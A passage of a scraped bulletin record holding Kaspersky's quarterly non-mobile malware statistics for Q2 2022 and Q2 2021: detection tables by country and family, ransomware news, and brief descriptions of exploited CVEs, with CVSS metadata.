AdWare.OSX.Pirrit.ac | 7.58 \n5 | AdWare.OSX.Pirrit.o | 6.48 \n6 | Monitor.OSX.HistGrabber.b | 5.27 \n7 | AdWare.OSX.Agent.u | 4.27 \n8 | AdWare.OSX.Bnodlero.at | 3.99 \n9 | Trojan-Downloader.OSX.Shlayer.a | 3.87 \n10 | Downloader.OSX.Agent.k | 3.67 \n11 | AdWare.OSX.Pirrit.aa | 3.35 \n12 | AdWare.OSX.Pirrit.ae | 3.24 \n13 | Backdoor.OSX.Twenbc.e | 3.16 \n14 | AdWare.OSX.Bnodlero.ax | 3.06 \n15 | AdWare.OSX.Agent.q | 2.73 \n16 | Trojan-Downloader.OSX.Agent.h | 2.52 \n17 | AdWare.OSX.Bnodlero.bg | 2.42 \n18 | AdWare.OSX.Cimpli.m | 2.41 \n19 | AdWare.OSX.Pirrit.gen | 2.08 \n20 | AdWare.OSX.Agent.gen | 2.01 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs usual, the TOP 20 ranking for threats detected by Kaspersky security solutions for macOS users is dominated by various adware. AdWare.OSX.Amc.e, also known as Advanced Mac Cleaner, is a newcomer and already a leader, found with a quarter of all attacked users. Members of this family display fake system problem messages, offering to buy the full version to fix those. It was followed by members of the AdWare.OSX.Agent and AdWare.OSX.Pirrit families.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025743/10-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | France | 2.93 \n2 | Canada | 2.57 \n3 | Spain | 2.51 \n4 | United States | 2.45 \n5 | India | 2.24 \n6 | Italy | 2.21 \n7 | Russian Federation | 2.13 \n8 | United Kingdom | 1.97 \n9 | Mexico | 1.83 \n10 | Australia | 1.82 \n \n_* Excluded from the rating are countries and territories with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2022, the country where the most users were attacked was again France (2.93%), followed by Canada (2.57%) and Spain (2.51%). AdWare.OSX.Amc.e was the most common adware encountered in these three countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol, as before.\n\nTelnet | 82,93% \n---|--- \nSSH | 17,07% \n \n**_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2022_**\n\nThe statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 93,75% \n---|--- \nSSH | 6,25% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 36.28 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 14.66 \n3 | Backdoor.Linux.Mirai.ek | 9.15 \n4 | Backdoor.Linux.Mirai.ba | 8.82 \n5 | Trojan.Linux.Agent.gen | 4.01 \n6 | Trojan.Linux.Enemybot.a | 2.96 \n7 | Backdoor.Linux.Agent.bc | 2.58 \n8 | Trojan-Downloader.Shell.Agent.p | 2.36 \n9 | Trojan.Linux.Agent.mg | 1.72 \n10 | Backdoor.Linux.Mirai.cw | 1.45 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q2-2022/107025/#attacks-on-iot-honeypots>) for Q2 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### TOP 10 countries and territories that serve as sources of web-based attacks\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q2 2022, Kaspersky solutions blocked 1,164,544,060 attacks launched from online resources across the globe. A total of 273,033,368 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025818/11-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users around the world, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nNote that these rankings only include attacks by malicious objects that fall under the **Malware** class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 26.07 \n2 | Hong Kong | 14.60 \n3 | Algeria | 14.40 \n4 | Nepal | 14.00 \n5 | Tunisia | 13.55 \n6 | Serbia | 12.88 \n7 | Sri Lanka | 12.41 \n8 | Albania | 12.21 \n9 | Bangladesh | 11.98 \n10 | Greece | 11.86 \n11 | Palestine | 11.82 \n12 | Qatar | 11.50 \n13 | Moldova | 11.47 \n14 | Yemen | 11.44 \n15 | Libya | 11.34 \n16 | Zimbabwe | 11.15 \n17 | Morocco | 11.03 \n18 | Estonia | 11.01 \n19 | Turkey | 10.75 \n20 | Mongolia | 10.50 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._\n\nOn average during the quarter, 8.31% of the Internet users' computers worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025917/12-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2022, our File Anti-Virus detected **55,314,176** malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries and territories.\n\nNote that these rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 47.54 \n2 | Tajikistan | 44.91 \n3 | Afghanistan | 43.19 \n4 | Yemen | 43.12 \n5 | Cuba | 42.71 \n6 | Ethiopia | 41.08 \n7 | Uzbekistan | 37.91 \n8 | Bangladesh | 37.90 \n9 | Myanmar | 36.97 \n10 | South Sudan | 36.60 \n11 | Syria | 35.60 \n12 | Burundi | 34.88 \n13 | Rwanda | 33.69 \n14 | Algeria | 33.61 \n15 | Benin | 33.60 \n16 | Tanzania | 32.88 \n17 | Malawi | 32.65 \n18 | Venezuela | 31.79 \n19 | Cameroon | 31.34 \n20 | Chad | 30.92 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025948/13-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\nOn average worldwide, Malware-class local threats were registered on 14.65% of users' computers at least once during Q2. Russia scored 16.66% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-15T12:00:43", "type": "securelist", "title": "IT threat evolution in Q2 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-44228", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1097", "CVE-2022-1364", "CVE-2022-1529", "CVE-2022-1802", "CVE-2022-22965", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24521", "CVE-2022-26809", "CVE-2022-26925", "CVE-2022-28281", "CVE-2022-30190"], "modified": "2022-08-15T12:00:43", "id": "SECURELIST:0ED76DA480D73D593C82769757DFD87A", "href": "https://securelist.com/it-threat-evolution-in-q2-2022-non-mobile-statistics/107133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/12091857/abstract_malware_report-990x400.jpg)\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2021:\n\n * Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.\n * Web antivirus recognized 675,832,360 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.\n * Ransomware attacks were defeated on the computers of 97,451 unique users.\n * Our file antivirus detected 68,294,298 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 119,252 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140610/01-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140636/02-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.8 \n2 | Tajikistan | 5.0 \n3 | Afghanistan | 4.2 \n4 | Uzbekistan | 3.3 \n5 | Lithuania | 2.9 \n6 | Sudan | 2.8 \n7 | Paraguay | 2.5 \n8 | Zimbabwe | 1.6 \n9 | Costa Rica | 1.5 \n10 | Yemen | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nLast quarter, as per tradition, the most widespread family of bankers was ZeuS/Zbot (17.8%), but its share in Q2 almost halved, by 13 p.p. Second place again went to the CliptoShuffler family (9.9%), whose share also fell, by 6 p.p. The Top 3 is rounded out by SpyEye (8.8%), which added 5 p.p., climbing from the eighth place. Note the disappearance of Emotet from the Top 10, which was predictable given the liquidation of its infrastructure in the previous quarter.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.9 \n3 | SpyEye | Trojan-Spy.Win32.SpyEye | 8.8 \n4 | Trickster | Trojan.Win32.Trickster | 5.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.8 \n6 | Danabot | Trojan-Banker.Win32.Danabot | 3.6 \n7 | Nimnul | Virus.Win32.Nimnul | 3.3 \n8 | Cridex | Backdoor.Win32.Cridex | 2.3 \n9 | Nymaim | Trojan.Win32.Nymaim | 1.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 1.6 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Colonial Pipeline and closure of DarkSide\n\nRansomware attacks on large organizations continued in Q2. Perhaps the most notable event of the quarter was the [attack by the DarkSide group on Colonial Pipeline](<https://ics-cert.kaspersky.com/reports/2021/05/21/darkchronicles-the-consequences-of-the-colonial-pipeline-attack/>), one of the largest fuel pipeline operators in the US. The incident led to fuel outages and a state of emergency in four states. The results of the investigation, which involved the FBI and several other US government agencies, was reported to US President Joe Biden.\n\nFor the cybercriminals, this sudden notoriety proved unwelcome. In their blog, DarkSide's creators heaped the blame on third-party operators. Another post was published stating that DarkSide's developers had lost access to part of their infrastructure and were shutting down the service and the affiliate program.\n\nAnother consequence of this high-profile incident was a new rule on the Russian-language forum XSS, where many developers of ransomware, including REvil (also known as Sodinokibi or Sodin), LockBit and Netwalker, advertise their affiliate programs. The new rule forbade the advertising and selling of any ransomware programs on the site. The administrators of other forums popular with cybercriminals took similar decisions.\n\n#### Closure of Avaddon\n\nAnother family of targeted ransomware whose owners shut up shop in Q2 is Avaddon. At the same time as announcing the shutdown, the attackers [provided](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) Bleeping Computer with the decryption keys.\n\n#### Clash with Clop\n\nUkrainian police [searched](<https://cyberpolice.gov.ua/news/kiberpolicziya-vykryla-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shyfruvalnyka-ta-nanesenni-inozemnym-kompaniyam-piv-milyarda-dolariv-zbytkiv-2402/>) and arrested members of the Clop group. Law enforcement agencies also deactivated part of the cybercriminals' infrastructure, which [did not](<https://www.bleepingcomputer.com/news/security/clop-ransomware-is-back-in-business-after-recent-arrests/>), however, stop the group's activities.\n\n#### Attacks on NAS devices\n\nIn Q2, cybercriminals stepped up their attacks on network-attached storage (NAS) devices. There appeared the new [Qlocker](<https://support.qnap.ru/hc/ru/articles/360021328659-\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c-Qnap-Ransomware-Qlocker>) family, which packs user files into a password-protected 7zip archive, plus our old friends [ech0raix](<https://www.qnap.com/en/security-advisory/QSA-21-18>) and [AgeLocker](<https://www.qnap.com/en-us/security-advisory/QSA-21-15>) began to gather steam.\n\n### Number of new ransomware modifications\n\nIn Q2 2021, we detected 14 new ransomware families and 3,905 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2020 \u2014 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141411/03-en-ru-es-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2021, Kaspersky products and technologies protected 97,451 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141438/04-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141505/05-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.85 \n2 | Ethiopia | 0.51 \n3 | China | 0.49 \n4 | Pakistan | 0.40 \n5 | Egypt | 0.38 \n6 | Indonesia | 0.36 \n7 | Afghanistan | 0.36 \n8 | Vietnam | 0.35 \n9 | Myanmar | 0.35 \n10 | Nepal | 0.33 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.66 \n2 | Stop | Trojan-Ransom.Win32.Stop | 19.70 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.10 \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 6.37 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.08 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.87 \n7 | (generic verdict) | Trojan-Ransom.Win32.Agent | 5.19 \n8 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.39 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.48 \n10 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.26 \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2021, Kaspersky solutions detected 31,443 new modifications of miners.\n\n_Number of new miner modifications, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141534/06-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 363,516 unique users of Kaspersky products worldwide. At the same time, the number of attacked users gradually decreased during the quarter; in other words, the downward trend in miner activity returned.\n\n_Number of unique users attacked by miners, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141602/07-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141627/08-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 3.99 \n2 | Ethiopia | 2.66 \n3 | Rwanda | 2.19 \n4 | Uzbekistan | 1.61 \n5 | Mozambique | 1.40 \n6 | Sri Lanka | 1.35 \n7 | Vietnam | 1.33 \n8 | Kazakhstan | 1.31 \n9 | Azerbaijan | 1.21 \n10 | Tanzania | 1.19 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nQ2 2021 injected some minor changes into our statistics on exploits used by cybercriminals. In particular, the share of exploits for Microsoft Office dropped to 55.81% of the total number of threats of this type. Conversely, the share of exploits attacking popular browsers rose by roughly 3 p.p. to 29.13%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141656/09-en-malware-report-q2-2021-graphs-pc.png>))_\n\nMicrosoft Office exploits most often tried to utilize the memory corruption vulnerability [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). This error can occur in the Equation Editor component when processing objects in a specially constructed document, and its exploitation causes a buffer overflow and allows an attacker to execute arbitrary code. Also seen in Q2 was the similar vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which causes a buffer overflow on the stack in the same component. Lastly, we spotted an attempt to exploit the [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) vulnerability, which, like other bugs in Microsoft Office, permits the execution of arbitrary code in vulnerable versions of the software.\n\nQ2 2021 was marked by the emergence of several dangerous vulnerabilities in various versions of the Microsoft Windows family, many of them observed in the wild. Kaspersky alone found three vulnerabilities used in targeted attacks:\n\n * [CVE-2021-28310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28310>) \u2014 an out-of-bounds (OOB) write vulnerability in the Microsoft DWM Core library used in Desktop Window Manager. Due to insufficient checks in the data array code, an unprivileged user using the DirectComposition API can write their own data to the memory areas they control. As a result, the data of real objects is corrupted, which, in turn, can lead to the execution of arbitrary code;\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2014 an information disclosure vulnerability that exposes information about kernel objects. Together with other exploits, it allows an intruder to attack a vulnerable system;\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2014 a vulnerability in the ntfs.sys file system driver. It causes incorrect checking of transferred sizes, allowing an attacker to inflict a buffer overflow by manipulating parameters.\n\nYou can read more about these vulnerabilities and their exploitation in our articles [PuzzleMaker attacks with Chrome zero-day exploit chain](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) and [Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\nOther security researchers found a number of browser vulnerabilities, including:\n\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2014 a bug in the Microsoft Trident browser engine (MSHTML) that allows writing data outside the memory of operable objects;\n * Three Google Chrome vulnerabilities found in the wild that exploit bugs in various browser components: [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>) \u2014 a data type confusion vulnerability in the V8 scripting engine; [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2014 a use-after-free vulnerability in the WebGL component; and [CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>) \u2014 a heap corruption vulnerability;\n * Three vulnerabilities in the WebKit browser engine, now used mainly in Apple products (for example, the Safari browser), were also found in the wild: [CVE-2021-30661](<https://support.apple.com/en-us/HT212317>) \u2014 a use-after-free vulnerability; [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>) \u2014 a memory corruption vulnerability; and [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>) \u2014 an integer overflow vulnerability.\n\nAll of these vulnerabilities allow a cybercriminal to attack a system unnoticed if the user opens a malicious site in an unpatched browser.\n\nIn Q2, two similar vulnerabilities were found ([CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) and [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>)), exploiting integer overflow bugs in the Microsoft Windows Cryptographic Provider component. Using these vulnerabilities, an attacker could prepare a special signed document that would ultimately allow the execution of arbitrary code in the context of an application that uses the vulnerable library.\n\nBut the biggest talking point of the quarter was the [critical vulnerabilities CVE-2021-1675 and CVE-2021-34527](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) in the Microsoft Windows Print Spooler, in both server and client editions. Their discovery, together with a [proof of concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), caused a stir in both the expert community and the media, which dubbed one of the vulnerabilities PrintNightmare. Exploitation of these vulnerabilities is quite trivial, since Print Spooler is enabled by default in Windows, and the methods of compromise are available even to unprivileged users, including remote ones. In the latter case, the RPC mechanism can be leveraged for compromise. As a result, an attacker with low-level access can take over not only a local machine, but also the domain controller, if these systems have not been updated, or available [risk mitigation methods](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) against these vulnerabilities have not been applied.\n\nAmong the network threats in Q2 2021, attempts to brute-force passwords in popular protocols and services (RDP, SSH, MSSQL, etc.) are still current. Attacks using EternalBlue, EternalRomance and other such exploits remain prevalent, although their share is gradually shrinking. New attacks include [CVE-2021-31166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31166>), a vulnerability in the Microsoft Windows HTTP protocol stack that causes a denial of service during processing of web-server requests. To gain control over target systems, attackers are also using the previously found NetLogon vulnerability ([CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>)) and, for servers running Microsoft Exchange Server, vulnerabilities recently discovered while researching targeted attacks by the [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group.\n\n## Attacks on macOS\n\nAs for threats to the macOS platform, Q2 will be remembered primarily for the appearance of new samples of the XCSSET Trojan. Designed to steal data from browsers and other applications, the malware is notable for spreading itself through infecting projects in the Xcode development environment. The Trojan takes the form of a bash script packed with the SHC utility, allowing it to evade macOS protection, which does not block script execution. During execution of the script, the SHC utility uses the RC4 algorithm to decrypt the payload, which, in turn, downloads additional modules.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 14.47 \n2 | AdWare.OSX.Pirrit.ac | 13.89 \n3 | AdWare.OSX.Pirrit.o | 10.21 \n4 | AdWare.OSX.Pirrit.ae | 7.96 \n5 | AdWare.OSX.Bnodlero.at | 7.94 \n6 | Monitor.OSX.HistGrabber.b | 7.82 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.69 \n8 | AdWare.OSX.Bnodlero.bg | 7.28 \n9 | AdWare.OSX.Pirrit.aa | 6.84 \n10 | AdWare.OSX.Pirrit.gen | 6.44 \n11 | AdWare.OSX.Cimpli.m | 5.53 \n12 | Trojan-Downloader.OSX.Agent.h | 5.50 \n13 | Backdoor.OSX.Agent.z | 4.64 \n14 | Trojan-Downloader.OSX.Lador.a | 3.92 \n15 | AdWare.OSX.Bnodlero.t | 3.64 \n16 | AdWare.OSX.Bnodlero.bc | 3.36 \n17 | AdWare.OSX.Ketin.h | 3.25 \n18 | AdWare.OSX.Bnodlero.ay | 3.08 \n19 | AdWare.OSX.Pirrit.q | 2.84 \n20 | AdWare.OSX.Pirrit.x | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs in the previous quarter, a total of 15 of the Top 20 threats for macOS are adware programs. The Pirrit and Bnodlero families have traditionally stood out from the crowd, with the former accounting for two-thirds of the total number of threats.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141728/10-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | India | 3.77 \n2 | France | 3.67 \n3 | Spain | 3.45 \n4 | Canada | 3.08 \n5 | Italy | 3.00 \n6 | Mexico | 2.88 \n7 | Brazil | 2.82 \n8 | USA | 2.69 \n9 | Australia | 2.53 \n10 | Great Britain | 2.33 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2021, first place by share of attacked users went to India (3.77%), where adware applications from the Pirrit family were most frequently encountered. A comparable situation was observed in France (3.67%) and Spain (3.45%), which ranked second and third, respectively.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2021, as before, most of the attacks on Kaspersky traps came via the Telnet protocol.\n\nTelnet | 70.55% \n---|--- \nSSH | 29.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q2 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 63.06% \n---|--- \nSSH | 36.94% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 30.25% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 27.93% \n3 | Backdoor.Linux.Mirai.ba | 5.82% \n4 | Backdoor.Linux.Agent.bc | 5.10% \n5 | Backdoor.Linux.Gafgyt.a | 4.44% \n6 | Trojan-Downloader.Shell.Agent.p | 3.22% \n7 | RiskTool.Linux.BitCoinMiner.b | 2.90% \n8 | Backdoor.Linux.Gafgyt.bj | 2.47% \n9 | Backdoor.Linux.Mirai.cw | 2.52% \n10 | Backdoor.Linux.Mirai.ad | 2.28% \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q2 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q2-2021/103424/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the 